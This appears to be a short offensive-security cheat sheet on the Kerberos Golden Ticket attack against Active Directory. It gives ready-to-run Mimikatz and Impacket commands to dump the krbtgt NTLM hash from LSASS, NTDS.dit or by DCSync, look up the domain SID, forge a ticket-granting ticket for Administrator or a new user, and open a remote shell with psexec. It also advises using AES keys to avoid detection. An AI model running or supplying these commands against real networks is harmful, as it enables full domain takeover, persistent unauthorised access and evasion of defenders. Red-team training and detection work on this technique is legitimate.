Golden Ticket

Consist on the creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user through the use of the NTLM hash of the Active Directory (AD) krbtgt account. This technique is particularly advantageous because it enables access to any service or machine within the domain as the impersonated user. It's crucial to remember that the krbtgt account's credentials are never automatically updated.

NTLM Hash of krbtgt

Domain admin privileges or a similar level of access is typically required to acquire the NTLM hash of the krbtgt account. It can be extracted from the LSASS process or the NTDS.dit file located on any Domain Controller (DC) within the domain. Furthermore, executing a DCsync attack is another strategy to obtain this NTLM hash.

Locally

Use Mimikatz

.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt

Remotely

Use impacket-secretsdump

secretsdump.py <DOMAIN>/<USER_ADMIN>:'<PASS>'@<DC> | grep krbtgt

SID Domain with impacket-lookupsid.py

lookupsid.py <DOMAIN>/<USER>:'<PASS>'@<DC> | grep -i "domain sid"

Attack

Locally

With Mimikatz

kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<SID_DOMAIN> /krbtgt:<NTLM_KRBTGT> /id:500 /ptt

We can then create a separate command shell, using the Golden Ticket, with the following command:

misc::cmd

Although the NTLM hash serves as a viable method for this purpose, it is strongly recommended to forge tickets using the Advanced Encryption Standard (AES) Kerberos keys (AES128 and AES256) for operational security reasons.

Remotely

With Impacket-ticketer.py

ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administrator

ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <NEW_USER>

Now import the ticket and use it

export KRB5CCNAME=<PATH_TO_FILE>.ccache

psexec.py <DOMAIN>/<NEW_USER>@<MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP> -dc-ip <DC> -k -no-pass